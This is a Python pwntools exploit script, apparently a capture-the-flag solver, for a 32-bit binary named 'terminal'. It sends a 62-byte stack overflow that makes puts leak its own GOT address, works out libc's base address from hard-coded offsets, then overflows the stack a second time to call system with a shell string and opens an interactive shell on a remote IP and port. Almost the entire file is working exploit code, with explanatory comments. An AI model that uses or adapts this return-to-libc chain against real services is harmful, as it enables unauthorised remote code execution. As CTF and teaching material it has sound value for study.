#!/usr/bin/python3
"""Solver script for the `terminal` challenge binary (pwntools).

Flow, as the statements below show: one request that makes the service print
the runtime address of puts (read from its own GOT entry), then a second
request whose return address is computed from that leak.  Every libc offset
is a hard-coded constant for one specific libc build, so the script is tied
to the service it was written against and performs no check of that.

Defender's reading: the fixed 62-byte filler and the absolute addresses
(0x804974d, target.sym.puts used as a raw value) mean the chain appears to
assume no stack canary and a non-PIE binary; a stack protector or PIE would
each break the fixed-layout assumption this script encodes.
"""

from pwn import *

# Load the challenge ELF for symbol lookups (target.sym / target.got) and
# set pwntools' context (arch, endianness, word size) from it.
# checksec=False only suppresses the protection summary pwntools prints.
context.binary = target = ELF("./terminal", checksec=False)

# r = process()   # local run against ./terminal; disabled in favour of remote

r = remote("20.199.76.210", 1005)

# func

# Send one line after the service's "# " prompt; every stage goes through this.
s = lambda a: r.sendlineafter(b"# ", a)

# leak

# Stage 1: 62 bytes of filler, then the PLT stub of puts in the return-address
# slot.  Under the 32-bit stack calling convention the next dword is where
# puts returns to and the one after it is puts' first argument -- here the
# GOT slot of puts itself, so the service prints the resolved libc address.
# What 0x804974d points at is not visible from this file; presumably an
# address inside the (non-PIE) binary -- TODO confirm against the disassembly.
buf = b"A"*62
buf += p32(target.sym.puts)
buf += p32(0x804974d)
buf += p32(target.got.puts)
s(buf)

# The first four reply bytes are the leaked pointer, unpacked little-endian.
puts = u32(r.recv(4))
log.info("puts: 0x%lx", puts)

# Hard-coded offsets of puts and system within the remote libc.  These are
# build-specific constants, not derived at runtime; nothing here verifies
# that the leaked value actually belongs to the libc they were taken from.
libc_base = puts - 0x76aa0
log.info("libc: 0x%lx", libc_base)
system = libc_base + 0x4f8f0
log.info("system: 0x%lx", system)
# Value handed to system() as its argument in stage 2; presumably the
# address of a shell-command string in libc -- not verifiable from this file.
sh = libc_base + 0x1bcde8

# shell

# Stage 2: same filler, return address replaced by system; "BLUH" occupies
# the slot system would return to (never meaningfully used), and the final
# dword is system's single argument.
buf = b"A"*62
buf += p32(system)
buf += b"BLUH"
buf += p32(sh)
s(buf)

# Hand the connection to the user once the second request has been sent.
r.interactive()